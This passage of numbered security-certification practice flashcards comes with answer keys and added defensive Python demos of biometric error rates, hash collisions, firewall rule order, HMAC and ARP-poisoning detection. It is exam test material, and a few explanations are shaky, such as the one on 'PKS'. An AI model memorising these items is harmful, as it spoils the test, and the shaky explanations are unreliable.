Users must wait a certain amount of time before they are allowed to change passwords.

Passwords cannot be reused until they have been expired a certain amount of time.

Users must change passwords after a certain amount of time.

Users must not change passwords until a
certain date.

A

Users must wait a certain amount of time before they are allowed to change passwords.

Correct Answer:
A minimum password age requires that users must wait a certain amount of time before they are allowed to change passwords.
Incorrect Answers:
A maximum password age setting requires that users must change passwords after a certain amount of time.
Passwords are typically good only for a certain amount of time, not through a certain date.
Passwords typically cannot be reused until a certain number of password changes have occurred, preventing the use of the last specified number of passwords.

402
Q

A term used to identify an authentication scheme that involves both sides of the communication authenticating is:

Mutual authentication
Single sign-on
Nonrepudiation
Hashing

A

Mutual authentication

Correct Answer:
Mutual authentication requires both sides of a communications session to authenticate to each other.
Incorrect Answers:
Single sign-on (SSO) is a concept that provides for one authentication to be used for multiple resources.
Nonrepudiation ensures that a party cannot deny that it took an action.
Hashing involves a one-way function that produces a message digest from a piece of text.

403
Q

Which of the following are considered symmetric encryption algorithms? (Choose two.)

AES
RSA
MD5
SHA
3DES
A

AES
3DES

Correct Answers:
AES and 3DES are symmetric (shared-key) encryption standards. Note that 3DES is deprecated and being withdrawn; AES is the current standard.
Incorrect Answers:
SHA and MD5 are hashing algorithms, and RSA is an asymmetric algorithm.

404
Q

Which of the following is typically conducted as a first step in the overall business continuity/disaster recovery strategy?

Business impact analysis
Business continuity plan
Disaster recovery plan
System backup plan

A

Business impact analysis

Correct Answer:
The business impact analysis (BIA) is a critical first step in developing the business continuity plan (BCP). It involves determining what risks are present and their effects on the business and its assets.
Incorrect Answers:
The BCP is the overall and final product that the BIA contributes to. The BIA must be completed as one of the first steps, as it essentially is the risk assessment for the BCP.
The disaster recovery plan (DRP) concerns itself with recovering the assets and operations of the business immediately following a disaster.
A system backup plan is but one element of the DRP and may or may not be one of the first things accomplished for that plan.

405
Q

Which of the following devices is intentionally left nonsecure, with the hopes of luring a hacker away from the network and observing them?

Bastion host
IDS
Honeypot
IPS

A

Honeypot

Correct Answer:
A honeypot is a host that has been left with some vulnerabilities open to lure a hacker away from attacking the network and to observe his or her attack methods.
Incorrect Answers:
A bastion host is a deliberately hardened host exposed to an untrusted network; it is locked down, not left vulnerable.
An intrusion detection system (IDS) is used to detect network attacks.
An intrusion prevention system (IPS) is used to detect attacks and attempt to prevent them by rerouting traffic, blocking ports, etc.

406
Q

Which of the following identifies a security reason to perform a site survey to identify rogue access points?

Frequency overlap
Signal propagation
Bypass security controls
Interference

A

Bypass security controls

Correct Answer:
Rogue wireless routers could be used by unauthorized individuals to access the network and bypass security controls such as firewalls.
Incorrect Answers:
These issues may affect performance and can be important to security, but do not have a direct impact on securing the wireless network.

407
Q

Which of the following statements best describes the concept of “implicit deny”?

Anything that is not specifically denied is specifically allowed.

Anything that is not specifically allowed is denied by default.

Anything that is not specifically denied is allowed by default.

Anything that is not specifically allowed is specifically denied.

A

Anything that is not specifically allowed is denied by default.

Correct Answer:
Under implicit deny, anything not specifically allowed is denied by default, with no deny rule required; the deny is implied by the absence of a matching allow rule (as with the invisible "deny any" at the end of a router ACL).
Incorrect Answers:
"Not specifically allowed is specifically denied" describes an explicit deny rule rather than a default.
"Not specifically denied is specifically allowed" describes an explicit allow, and "not specifically denied is allowed by default" describes implicit allow, the opposite and insecure default.

408
Q

A printed e-mail would be considered which kind of evidence?

Direct evidence
Documentary evidence
Demonstrative evidence
Real evidence

A

Documentary evidence

Correct Answer:
Documentary evidence is usually a printed form of evidence, a recording, or photograph.
Incorrect Answers:
Real (or physical) evidence is a tangible object presented in court (such as a weapon).
Direct evidence is testimony from someone who actually witnessed the event.
Demonstrative evidence is presenting a physical object that displays the results of an event that occurred.

409
Q

Which of the following is a Type I error?

False acceptance rate
False negative
Crossover error rate
False rejection rate

A

False rejection rate

Correct Answer:
A false rejection rate (FRR) is a Type I error in biometrics.
Incorrect Answers:
This also equates to a false negative.
A false acceptance rate (FAR) is a Type II error and is sometimes referred to as a false positive.
The crossover error rate (CER) is the point where the FRR and FAR are equal.
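The FRR/FAR/CER relationship from this card and the earlier false-acceptance card, as an added example that is not from the original deck: constructed match scores for genuine users and impostors are swept across thresholds to show how raising the threshold trades Type II errors for Type I errors and where the two rates cross. The score lists and the 0-100 scale are assumptions.

```python
# Added example (not from the flashcard deck): computing FRR (Type I),
# FAR (Type II) and the crossover error rate from constructed match scores.

# Constructed scores (0-100) from a hypothetical biometric matcher.
GENUINE = [88, 91, 79, 95, 84, 70, 93, 86, 77, 90]    # authorized users vs. their own template
IMPOSTOR = [35, 52, 61, 48, 73, 40, 58, 66, 30, 55]   # unauthorized users vs. someone else's template


def false_reject_rate(genuine, threshold: int) -> float:
    """FRR / Type I error: fraction of genuine attempts scoring below the threshold."""
    return sum(1 for s in genuine if s < threshold) / len(genuine)


def false_accept_rate(impostor, threshold: int) -> float:
    """FAR / Type II error: fraction of impostor attempts scoring at or above the threshold."""
    return sum(1 for s in impostor if s >= threshold) / len(impostor)


def crossover_threshold(genuine, impostor):
    """Sweep every threshold and return (threshold, FAR, FRR) at the point where
    the two rates are closest: the crossover (equal) error rate, CER/EER."""
    best = None
    for t in range(0, 101):
        far = false_accept_rate(impostor, t)
        frr = false_reject_rate(genuine, t)
        if best is None or abs(far - frr) < abs(best[1] - best[2]):
            best = (t, far, frr)
    return best


def accept(score: int, threshold: int) -> bool:
    """The matcher's decision rule: accept when the score reaches the threshold."""
    return score >= threshold


if __name__ == "__main__":
    for t in (50, 71, 80):
        print(t, "FAR =", false_accept_rate(IMPOSTOR, t), "FRR =", false_reject_rate(GENUINE, t))
    print("CER at threshold", crossover_threshold(GENUINE, IMPOSTOR))  # (71, 0.1, 0.1)
```

A low threshold (50) lets most impostors through; a high one (80) rejects real users. A system tuned for security (a data centre door) sits above the CER to drive FAR toward zero; one tuned for convenience sits below it.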

410
Q

All of the following are valid 5.0 Risk Management strategies EXCEPT:

Risk elimination
Risk acceptance
Risk transference
Risk mitigation

A

Risk elimination

Correct Answer:
Risk can never be completely eliminated; it can only be reduced, accepted, or shifted to another party.
Incorrect Answers:
Acceptance, transference, and mitigation are all valid risk management strategies (risk avoidance, declining to undertake the risky activity at all, is the usual fourth).

411
Q

Which of the following protocols is considered a secure replacement for Telnet?

SSH
RLOGIN
TLS
SSL

A

SSH

Correct Answer:
Secure Shell (SSH) is considered a secure replacement for Telnet.
Incorrect Answers:
TLS and SSL are secure session protocols used in HTTPS traffic.
RLOGIN is an older, nonsecure protocol.

412
Q

Which of the following network devices provides centralized authentication services for secure remote access connections?

Proxy server
Firewall
VPN concentrator
Router

A

VPN concentrator

Correct Answer:
A VPN concentrator serves as a centralized authentication point for virtual private network connections.
Incorrect Answers:
None of these devices are used to provide centralized authentication services for secure remote access connections.

413
Q

An example of the risk mitigation strategy that involves transferring risk to another entity would be:

Alternate site
Service-level agreement
Separation of duties
Insurance

A

Insurance

Correct Answer:
Insurance is a method of risk transference where the organization pays a premium for the insurance company to assume the risk. If a disaster or event occurs, the organization is paid for its losses.
Incorrect Answers:
Separation of duties transfers key duties to another individual but does not transfer the risk away from the organization.
A service-level agreement between two parties specifies levels of service and support, but the organization still maintains risk.
An alternate site is used to transfer operations from a primary site in the event of a disaster, but the risk is still borne by the organization.

414
Q

What is the term used when two different pieces of data generate the same hash value?

Crossover error
Disruption
Collision
Interference

A

Collision

Correct Answer:
A collision occurs when two different inputs are hashed and produce the same hash value. Every hash function has collisions because it maps arbitrary-length input to a fixed-length output; the security property is that finding one must be computationally infeasible. The birthday bound means roughly 2^(n/2) trials are needed for an n-bit hash, which is why MD5 and SHA-1, for which practical collisions have been demonstrated, are no longer trusted for collision resistance.
Incorrect Answers:
A crossover error is a reference to biometric authentication factors.
Interference refers to wireless networks, and disruption is an invalid term in this context.
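The following is an added example, not part of the original deck, showing the birthday attack the explanation above describes. Because a collision in full SHA-256 is out of reach, the hash is truncated to 32 bits (an assumption made for the demonstration); two distinct inputs with the same truncated value are then found in roughly 2^16 attempts.

```python
import hashlib
from typing import Tuple


def truncated_hash(data: bytes, bits: int = 32) -> int:
    """Return the first `bits` bits of SHA-256(data) as an integer.

    Truncating to 32 bits is an assumption made only so the birthday bound
    (about 2**16 trials) is reachable quickly; full SHA-256 collisions are
    infeasible.
    """
    digest = hashlib.sha256(data).digest()
    return int.from_bytes(digest, "big") >> (256 - bits)


def find_collision(bits: int = 32, prefix: bytes = b"msg-") -> Tuple[bytes, bytes]:
    """Birthday attack: hash distinct inputs until two map to the same value.

    Returns the two distinct inputs. Expected work is about 2**(bits / 2)
    hashes, far less than the 2**bits a brute-force preimage search needs.
    """
    seen = {}  # truncated hash value -> first input that produced it
    counter = 0
    while True:
        candidate = prefix + str(counter).encode()  # constructed, unique inputs
        h = truncated_hash(candidate, bits)
        if h in seen and seen[h] != candidate:
            return seen[h], candidate
        seen[h] = candidate
        counter += 1


if __name__ == "__main__":
    a, b = find_collision(32)
    print(a, b, hex(truncated_hash(a)), hex(truncated_hash(b)))
```

Doubling the output width (bits=64) multiplies the expected work by 2^16, which is the practical reason digest length matters when choosing a hash for integrity or signatures.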

415
Q

Which of the following statements are correct with regard to the concepts of fail-secure and fail-safe? (Choose two.)

A fail-safe device responds by not doing anything to cause harm when the failure occurs.
A fail-safe device responds by making sure the device is using a secure state when a failure occurs.
A fail-secure device responds by not doing anything to cause harm when the failure occurs.
A fail-secure device responds by making sure the device is using a secure state when a failure occurs.

A

A fail-safe device responds by not doing anything to cause harm when the failure occurs.
A fail-secure device responds by making sure the device is using a secure state when a failure occurs.

Correct Answers:
A fail-safe device responds by not doing anything to cause harm when the failure occurs. A fail-secure device responds by making sure the device is using a secure state when a failure occurs.
Incorrect Answers:
The fail-secure answer is the definition of fail-safe, and the fail-safe answer is the definition of fail-secure, not the other way around.

416
Q

The risk that remains after all reducing and mitigation actions have been taken is called:

Mitigated risk
Accepted risk
Low risk
Residual risk

A

Residual risk

Correct Answer:
Residual risk is what risk remains after all mitigation and reduction strategies have been implemented.
Incorrect Answers:
Low risk is a level that may be accepted without mitigation or requires little mitigation.
Accepted risk is what risk the management authority chooses to accept with or without mitigations in place.
Mitigated risk is that risk that has been reduced to a lower level.

417
Q

Which of the following technologies is NOT typically used to design secure network architectures?

VLAN
DMZ
Clustering
VPN

A

Clustering

Correct Answer:
Although it is part of high availability design, clustering is not typically used in the design and implementation of a secure network architecture.
Incorrect Answers:
DMZs are used as a security buffer zone to separate internal networks and resources from externally accessible ones.
VLANs are used to segregate local networks, providing a secure internal infrastructure.
VPNs provide for secure remote access solutions.

418
Q

A “deny any-any” rule in a firewall ruleset is normally placed:

At the top of the ruleset.

Nowhere in the ruleset if it has a default allow policy.

Below the last allow rule, but above the first deny rule in the ruleset.

At the bottom of the ruleset.

A

At the bottom of the ruleset.

Correct Answer:
A “deny any-any” rule denies all traffic from all sources to all destinations, so it should be the last rule in the ruleset. Firewalls evaluate rules top-down and stop at the first match, so an explicit deny-all at the bottom only catches traffic that no earlier allow rule matched. Even on a firewall whose default policy is already deny, the explicit rule is usually kept so that dropped traffic is logged.
Incorrect Answers:
Placement of the “deny any-any” rule anywhere else in the ruleset would match every packet first and prevent any rules that follow it from ever being processed.
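An added example, not from the original deck, that models first-match rule processing and shows why a deny any-any rule at the top shadows every rule below it. The rule format, addresses, and ports are assumptions made for the demonstration.

```python
from dataclasses import dataclass
from ipaddress import ip_address, ip_network
from typing import List, Optional


@dataclass
class Rule:
    action: str          # "allow" or "deny"
    src: str             # CIDR, or "any"
    dst: str             # CIDR, or "any"
    port: Optional[int]  # None means any port

    def matches(self, src_ip: str, dst_ip: str, port: int) -> bool:
        def in_net(ip: str, net: str) -> bool:
            return net == "any" or ip_address(ip) in ip_network(net)

        return (
            in_net(src_ip, self.src)
            and in_net(dst_ip, self.dst)
            and (self.port is None or self.port == port)
        )


def evaluate(rules: List[Rule], src_ip: str, dst_ip: str, port: int,
             default: str = "deny") -> str:
    """First-match semantics: the first matching rule decides and nothing
    after it is consulted. If no rule matches, the implicit default applies."""
    for rule in rules:
        if rule.matches(src_ip, dst_ip, port):
            return rule.action
    return default


def shadowed_rules(rules: List[Rule]) -> List[Rule]:
    """Rules that can never fire because an earlier any-any rule with no
    port restriction already matches every packet."""
    for i, rule in enumerate(rules):
        if rule.src == "any" and rule.dst == "any" and rule.port is None:
            return rules[i + 1:]
    return []


# Constructed rulesets (assumed addresses) for the demonstration.
GOOD_RULES = [
    Rule("allow", "10.0.0.0/8", "192.168.1.10/32", 443),
    Rule("allow", "10.0.0.0/8", "192.168.1.20/32", 22),
    Rule("deny", "any", "any", None),   # explicit cleanup rule, last
]
BAD_RULES = [Rule("deny", "any", "any", None)] + GOOD_RULES[:2]  # deny-all first


if __name__ == "__main__":
    print(evaluate(GOOD_RULES, "10.1.1.5", "192.168.1.10", 443))  # allow
    print(evaluate(BAD_RULES, "10.1.1.5", "192.168.1.10", 443))   # deny
    print(len(shadowed_rules(BAD_RULES)), "rules are unreachable")
```

The `shadowed_rules` check is the kind of lint worth running on an exported ruleset: any rule after an unrestricted any-any entry is dead configuration, whether it is an allow or a deny.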

419
Q

You are troubleshooting a communication problem with an application that sends data to a remote system. What tool can you use to view the traffic being sent on the network by the application?

Switch monitor
Spectrum analyzer
Frequency analyzer
Protocol analyzer

A

Protocol analyzer

Correct Answer:
In order to view network traffic, it must be sniffed or captured using a protocol analyzer (sometimes called a sniffer).
Incorrect Answers:
These devices cannot be used to capture and view network traffic.

420
Q

Jeff is a user on the network and needs to be able to change the system time. Instead of adding Jeff to the Administrators group, you give Jeff the “Change the system time” right. What security principle are you following in this example?

Separation of duties
Discretionary access control
Role-based access control
Least privilege

A

Least privilege

Correct Answer:
The principle of least privilege allows users to have only the privileges necessary to perform their duties and no more.
Incorrect Answers:
Separation of duties requires critical roles to be split among personnel so no one user has the privileges to commit fraud or to abuse his or her role.
Role-based access control and discretionary access control are access control models.

421
Q

Which of the following types of malware is designed to activate after a predetermined amount of time or upon a specific event or date?

Logic bomb
Adware
Trojan
Rootkit

A

Logic bomb

Correct Answer:
A logic bomb is a type of malware, usually very difficult to detect, that is designed to activate only after a specific time has passed or a specific date or event has occurred.
Incorrect Answers:
These other types of malware are not tied to specific dates or events.

422
Q

Which of the following goals of information security deals with identifying modifications to data?

Confidentiality
Availability
Integrity
Nonrepudiation

A

Integrity

Correct Answer:
Integrity provides for detection of data modification.
Incorrect Answers:
Confidentiality deals with protecting data from unauthorized access, not modification.
Availability ensures data and systems are available to authorized users whenever needed.
Nonrepudiation involves preventing a user from denying that he or she performed an action.

423
Q

What is the security term for disabling unnecessary services on a system and uninstalling unnecessary software?

Application restriction
System reduction
System hardening
Network hardening

A

System hardening

Correct Answer:
System hardening involves disabling unnecessary services and protocols on a host, as well as uninstalling software that is not needed.
Incorrect Answers:
System reduction, network hardening and application restriction are incorrect.
These are nonexistent terms used as distractors.

424
Q

Which of the following is used to identify certificates that are no longer valid for use?

CA
CAL
PKS
CRL

A

CRL

Correct Answer:
The certificate revocation list (CRL) is used to identify invalid certificates.
Incorrect Answers:
A CAL is a client access license.
PKS is a cryptographic file standard, and a CA is a certificate authority, which issues certificates.

425
Q

When performing an investigation on a mobile device, you would like to ensure that you shield the device from sending or receiving signals. What would you use?

Protocol analyzer
Faraday cage
Signal reducer
Spectrum analyzer

A

Faraday cage

Correct Answer:
A Faraday cage can be used to shield devices from sending or receiving electronic signals.
Incorrect Answers:
A protocol analyzer is used to capture and view network traffic.
A spectrum analyzer is used for site surveys when designing wireless networks.
A signal reducer is not a device used in this context.

426
Q

Which of the following steps is the first to be accomplished during a penetration test?

Privilege escalation
Password cracking
Obtain permission for the test
Port scanning

A

Obtain permission for the test

Correct Answer:
Before beginning any type of penetration test or vulnerability assessment, you must first obtain permission from the responsible system owner to avoid legal or liability issues.
Incorrect Answers:
Although these are all valid steps to take during a penetration test or vulnerability assessment, none of these should be started without obtaining permission from the responsible system owner.

427
Q

A user complains that he or she cannot access sites that use the HTTPS protocol. Which port should be opened on the firewall to allow this traffic?

8080
80
22
443

A

443

Correct Answer:
TCP port 443 is used by HTTPS, which is HTTP carried over TLS (historically SSL, which is now deprecated). Both HTTPS and the TLS session that protects it are associated with port 443.
Incorrect Answers:
Port 80 is used by HTTP, port 22 by SSH, and port 8080 by some proxy server implementations.

428
Q

All of the following are considered secure application development practices EXCEPT:

Back doors
Memory management
Input validation
Error and exception handling

A

Back doors

Correct Answer:
Back doors are a security risk due to the possibility that an attacker could use them to gain unauthorized access to the program.
Incorrect Answers:
All of these are considered secure coding and application development practices.

429
Q

Which of the following describes an alternate processing site that is instantly available in the event of a disaster?

Reciprocal site
Warm site
Hot site
Cold site

A

Hot site

Correct Answer:
A hot site is an alternate processing site that can function almost immediately after a disaster and has equipment and data prepositioned, as well as full utilities.
Incorrect Answers:
Cold sites have only space and utilities available and take longer to activate.
Warm sites have space, utilities, and possibly some equipment and furniture, but still need equipment, personnel, and data transferred, so they cannot be activated instantly.
Reciprocal sites are alternate locations provided by and in agreement with another organization and are typically co-located with that organization.

430
Q

Which of the following security controls is designed to prevent tailgating?

Multifactor authentication
Separation of duties
Mantrap
Least privilege

A

Mantrap

Correct Answer:
A mantrap, an area between two locked doors from which the second door cannot be opened until the first door is locked, is designed to allow only one person at a time to enter a facility, effectively preventing tailgating.
Incorrect Answers:
Separation of duties and least privilege are two security principles designed to prevent collusion and elevated privileges, respectively.
Multifactor authentication is designed to positively identify and authenticate an individual but does not prevent tailgating.

431
Q

Your company has a salesperson who travels a lot and will be connecting to hotel networks. What security recommendation would you make for her laptop?

Unencrypted drive
FDE
Host-based firewall
Null password

A

Host-based firewall

Correct Answer:
A host-based firewall should be used when connecting to untrusted networks, such as one in a hotel.
Incorrect Answers:
Having an unencrypted drive and null password are not security recommendations.
Although full disk encryption (FDE) can help if the laptop is lost or stolen, it will not help you in situations when you are making connections to an unknown and potentially unsecure network.
You could potentially be infected with a virus by connecting to an unknown network without having a firewall enabled, or be vulnerable to an attack.

432
Q

Bob logs on to the network and receives a message indicating that patches are not up to date and that he cannot be granted access to the network until patches are updated. What network feature is responsible for the message?

TPM
NAC
VPN
NAT

A

NAC

Correct Answer:
Network access control (NAC) can be used to prevent hosts from connecting to the network unless they meet certain security requirements, such as patch level, up-to-date antivirus signatures, and so forth.
Incorrect Answers:
None of these other technologies are concerned with enforcing host security requirements prior to connecting to the network.

433
Q

Which of the following statements best describes a Trusted Platform Module?

A secure logon module
A code module that performs authentication
A hardware module that performs cryptographic functions
A software module that prevents application attacks

A

A hardware module that performs cryptographic functions

Correct Answer:
A Trusted Platform Module (TPM) is a hardware device, usually in the form of an embedded chip, that performs cryptographic functions such as generating random numbers, storing keys so they cannot be exported, and sealing keys to measured boot state. It does not encrypt the disk itself; full disk encryption software such as BitLocker uses the TPM to protect the key that encrypts the drive.
Incorrect Answers:
None of these are valid choices to describe a Trusted Platform Module.

434
Q

In a PKI infrastructure, what is the name of the list that contains all the certificates that have been deemed invalid?

Certificate revocation list
Certificate invalidation list
Certificate authority
Certificate denial list

A

Certificate revocation list

Correct Answer:
A certificate revocation list (CRL) contains a list of all invalid or revoked certificates.
Incorrect Answers:
A certificate denial list and certificate invalidation list are false choices and do not exist.
A certificate authority is responsible for issuing certificates.

435
Q

Which of the following terms is most accurately defined by the amount of time a business can survive without a particular function?

Maximum tolerable downtime (MTD)
Recovery point objective (RPO)
Mean time between failures (MTBF)
Recovery time objective (RTO)

A

Maximum tolerable downtime (MTD)

Correct Answer:
The maximum tolerable downtime (MTD) indicates how long an asset may be down or offline without seriously impacting the organization.
Incorrect Answers:
The mean time between failures is an estimate of how long a piece of equipment will perform before failure.
The recovery point objective and recovery time objective refer to how much data may be lost during a failure or disaster and the maximum amount of time it must take to recover the system or data, respectively, before the organization is seriously impacted.

436
Q

Which of the following is used to verify the integrity of the message?

Message digest
Digital signature
Digital certificate
Symmetric key

A

Message digest

Correct Answer:
A message digest, or hash, can be used to verify the integrity of a message by comparing the original hash to one generated after receipt of the message. If the two match, the message is unchanged; if they do not match, the message was altered between transmission and receipt. Note that a bare digest only detects accidental or unsophisticated modification: an attacker who can alter the message can also recompute the digest, so protection against deliberate tampering requires a keyed hash (HMAC) or a digital signature over the digest.
Incorrect Answers:
Digital certificates contain public keys that are distributed to users.
Digital signatures provide for authentication and nonrepudiation (they do protect integrity as well, but they do so by signing a message digest).
Symmetric keys are not used to provide for integrity, but confidentiality.
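An added example, not part of the original deck, contrasting the bare digest the card describes with a keyed HMAC. The message, the shared key, and the attacker's rewrite are constructed for the demonstration.

```python
import hashlib
import hmac
from typing import Tuple


def digest(message: bytes) -> str:
    """Unkeyed SHA-256 digest, as in the card: anyone can compute it."""
    return hashlib.sha256(message).hexdigest()


def verify_digest(message: bytes, expected_hex: str) -> bool:
    # compare_digest avoids timing leaks when comparing authentication values.
    return hmac.compare_digest(digest(message), expected_hex)


def tag(message: bytes, key: bytes) -> str:
    """HMAC-SHA256: only a holder of `key` can produce a valid tag."""
    return hmac.new(key, message, hashlib.sha256).hexdigest()


def verify_tag(message: bytes, key: bytes, expected_hex: str) -> bool:
    return hmac.compare_digest(tag(message, key), expected_hex)


def attacker_rewrite_unkeyed(new_message: bytes) -> Tuple[bytes, str]:
    """An attacker in the path replaces the message and recomputes the
    digest. The receiver compares, sees a match, and accepts the forgery."""
    return new_message, digest(new_message)


def attacker_rewrite_keyed(new_message: bytes) -> Tuple[bytes, str]:
    """Without the key, the best the attacker can do is guess one
    (constructed wrong key); the receiver's verification fails."""
    return new_message, tag(new_message, b"attacker-guess")


if __name__ == "__main__":
    original = b"transfer 100 to alice"      # constructed sample message
    key = b"shared-secret-between-endpoints"  # constructed sample key
    forged, forged_digest = attacker_rewrite_unkeyed(b"transfer 100 to mallory")
    print("plain digest accepts forgery:", verify_digest(forged, forged_digest))
    forged, forged_tag = attacker_rewrite_keyed(b"transfer 100 to mallory")
    print("HMAC accepts forgery:", verify_tag(forged, key, forged_tag))
```

The first check shows why published checksums are only useful against corruption unless they are delivered over a channel the attacker cannot modify; the second shows the property a MAC adds.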

437
Q

All of the following are potential application security issues requiring attention EXCEPT:

Cross-site scripting
Buffer overflows
SQL injection
Malware

A

Malware

Correct Answer:
Malware is a security issue, but not specific to any applications.
Incorrect Answers:
All of these are potential application security issues that could affect both web-based and client-server applications.

438
Q

All of the following are security measures used to harden a host EXCEPT:

Updating antivirus signatures
Installing security patches
Opening unused ports
Uninstalling unnecessary applications

A

Opening unused ports

Correct Answer:
Opening unused ports would increase the attack surface on a host. Closing unused ports is considered a good hardening practice.
Incorrect Answers:
All of the other choices are considered good security measures to use when hardening a host.

439
Q

Which of the following security measures helps ensure data protection in the event a mobile device is lost or stolen?

Remote wiping
Remote encryption
Remote access
Remote destruction

A

Remote wiping

Correct Answer:
Remote drive or disk wiping is used to ensure data protection and confidentiality on a mobile device in the event it is lost or stolen.
Incorrect Answers:
Remote destruction and remote encryption are invalid terms in this context.
Remote access enables a remote user to authenticate to and access an organization’s private network.

440
Q

All of the following are types of penetration testing EXCEPT:

White box
Gray box
Black box
Blue box

A

Blue box

Correct Answer:
Blue box testing is not a type of penetration testing.
Incorrect Answers:
Black box testing involves a penetration test where the test team has no knowledge of the network.
In gray box testing, the tester may have some knowledge given to them, such as an infrastructure diagram or IP address list.
In a white box test, the test team has full and detailed knowledge of the network, its design, functions, and applications.

441
Q

Which of the wireless encryption protocols uses the RC4 symmetric algorithm for encrypting wireless communication?

WPA2
WEP
TLS
EAP

A

WEP

Correct Answer:
WEP (Wired Equivalent Privacy) uses the RC4 stream cipher with a flawed key schedule and short, weak initialization vectors that repeat, making it an insecure wireless protocol whose keys can be recovered from captured traffic; as a result it should never be used.
Incorrect Answers:
None of these other choices use RC4: WPA2 uses AES-CCMP, TLS is a transport security protocol (RC4 cipher suites once existed but are now prohibited), and EAP is an authentication framework rather than an encryption protocol. The original WPA with TKIP also used RC4, but it is not among the options.

442
Q

Susan has received an e-mail message from her brother stating that if she forwards the e-mail to 10 different people that she will receive good fortune over the next three years. Susan forwards the e-mail. What policy has Susan violated in this example?

Social engineering policy
Need-to-know policy
Acceptable usage policy
Least privilege policy

A

Acceptable usage policy

Correct Answer:
An acceptable use policy (AUP) defines what users may and may not do with regard to information systems, including e-mail.
Incorrect Answers:
These policies apply to a wide range of security issues but do not define what actions users may perform on information systems.

443
Q

The hacker has managed to modify the cache on the system that stores the IP address and corresponding MAC address with inappropriate entries. What type of attack has occurred?

DHCP poisoning
DNS poisoning
ARP poisoning
VLAN poisoning

A

ARP poisoning

Correct Answer:
ARP poisoning involves introducing false entries into the host’s ARP cache, essentially spoofing MAC addresses.
Incorrect Answers:
DNS poisoning involves introducing false entries into a DNS server’s cache or its zone files.
DHCP and VLAN poisoning are invalid answers.
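An added example, not part of the original deck, showing how an analyst can spot the poisoned cache the card describes by parsing a host's neighbor table. The sample `ip neigh show` output and the gateway baseline are constructed for the demonstration.

```python
import re
from collections import defaultdict
from typing import Dict, List, Tuple

# Constructed sample of Linux `ip neigh show` output (not captured from a
# real host). The attacker at 192.168.1.20 has claimed the gateway's IP.
SAMPLE_NEIGH = """\
192.168.1.1 dev eth0 lladdr aa:bb:cc:dd:ee:01 REACHABLE
192.168.1.20 dev eth0 lladdr aa:bb:cc:dd:ee:01 REACHABLE
192.168.1.30 dev eth0 lladdr aa:bb:cc:dd:ee:02 STALE
192.168.1.40 dev eth0 lladdr aa:bb:cc:dd:ee:03 REACHABLE
"""

# Assumed known-good MAC for the gateway, recorded before the incident.
KNOWN_GATEWAY = {"192.168.1.1": "00:11:22:33:44:55"}

LINE_RE = re.compile(r"^(\S+) dev (\S+) lladdr ([0-9a-fA-F:]{17}) (\w+)$")


def parse_neigh(text: str) -> Dict[str, str]:
    """Map IP -> MAC from `ip neigh show` lines; entries without lladdr
    (FAILED/INCOMPLETE) carry no MAC and are skipped."""
    entries = {}
    for line in text.splitlines():
        m = LINE_RE.match(line.strip())
        if m:
            ip, _dev, mac, _state = m.groups()
            entries[ip] = mac.lower()
    return entries


def find_anomalies(entries: Dict[str, str],
                   baseline: Dict[str, str]) -> List[Tuple[str, str, object]]:
    """Two indicators of ARP poisoning:
    - one MAC answering for several IPs (the attacker impersonates others)
    - a baseline-known host (the gateway) whose MAC has changed."""
    findings = []
    by_mac = defaultdict(list)
    for ip, mac in entries.items():
        by_mac[mac].append(ip)
    for mac, ips in by_mac.items():
        if len(ips) > 1:
            findings.append(("duplicate-mac", mac, sorted(ips)))
    for ip, good_mac in baseline.items():
        seen = entries.get(ip)
        if seen is not None and seen != good_mac.lower():
            findings.append(("gateway-mac-changed", ip, seen))
    return findings


if __name__ == "__main__":
    for finding in find_anomalies(parse_neigh(SAMPLE_NEIGH), KNOWN_GATEWAY):
        print(finding)
```

A duplicate MAC is a lead rather than proof: VRRP/HSRP virtual addresses and some load balancers legitimately answer for several IPs, so confirm against the baseline or the switch's MAC table before acting. Static ARP entries for the gateway and Dynamic ARP Inspection on the switch are the usual preventive controls.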

444
Q

You have an Internet-facing web server that only serves static web pages to users. Recently you have discovered that someone has been using your server as a mail relay. Which service and port should you remove to stop this type of attack?

HTTP, port 80
SMTP, port 25
HTTP, port 443
SMTP, port 110

A

SMTP, port 25

Correct Answer:
Simple Mail Transfer Protocol (SMTP) uses TCP port 25 and is used to send e-mail; it should not be running on an Internet-facing server that only provides a web site, and an SMTP service that accepts mail for arbitrary destinations (an open relay) will be found and abused by spammers.
Incorrect Answers:
HTTP (port 80) must be allowed to run on the server to provide web content to users.
SMTP uses port 25, not port 110. Port 110 is used by POP3 to receive e-mail messages.
HTTPS uses port 443, not HTTP.

445
Q

You wish to send an encrypted message to Bob. Which of the following is used to encrypt a message sent to Bob in a PKI environment?

Private key
Symmetric key
Hash value
Public key

A

Public key

Correct Answer:
Bob’s public key is used to encrypt a message for him. Bob would then decrypt the message with his private key.
Incorrect Answers:
Symmetric keys and hashes are not used to encrypt a message to an individual in a PKI environment.
The private key would be used to decrypt, not encrypt, the message in this scenario.

446
Q

You are the security administrator for a small company and would like to limit clients that can connect to the wireless network by hardware address. What would you do?

Implement MAC filtering
Implement NAC
Enable SSID cloaking
Implement WEP

A

Implement MAC filtering

Correct Answer:
MAC address filtering, although not an effective security measure by itself, can be used to limit which clients, by hardware address, can connect to the wireless network.
Incorrect Answers:
WEP is a wireless security protocol.
NAC prevents clients from connecting that do not meet specified security requirements, such as patch level or antivirus signature.
SSID cloaking merely prevents potential wireless clients from seeing the wireless network name by stopping it from being broadcast.

447
Q

Your manager is interested in implementing a strong authentication scheme. Which of the following is considered the strongest authentication?

Fingerprint
Username/password
Iris scan
PIN

A

Iris scan

Correct Answer:
Out of the choices given, an iris scan is the strongest method of authentication, as these patterns are very unique to individuals. Of all of the biometric authentication methods, including voiceprint and fingerprints, iris scans are most accurate.
Incorrect Answers:
Username and password combinations are not considered strong methods of authentication, nor is a PIN by itself.
These are all considered single-factor forms of authentication.
Fingerprints are not considered as strong a method of biometric authentication as iris scans.

448
Q

Which of the following describes the best security practice to use when granting users elevated or administrative privileges?

Users who perform administrative-level tasks should be given the Domain Administrator user account name and password.

Users should have a normal user account for routine tasks, and an administrative account for tasks that require higher privileges.

Administrative privileges should be granted directly to those user accounts that perform administrative-level tasks.

Users who require higher privileges should be placed in the Administrators group.

A

Users should have a normal user account for routine tasks, and an administrative account for tasks that require higher privileges.

Correct Answer:
Users should have a normal user account for routine tasks, and an administrative account for tasks that require higher privileges.
Incorrect Answers:
None of these choices are considered to be good security practices.
User accounts should not be directly granted administrative privileges, and ordinary user-level accounts should not be placed in the Administrators group.
Additionally, no one should be given the Domain Administrator’s username and password to use on a routine basis.

449
Q

Which of the following disaster recovery technologies is used to help protect you from failures related to a hard disk?

RAID
Clustering
Striping without parity
Network load balancing

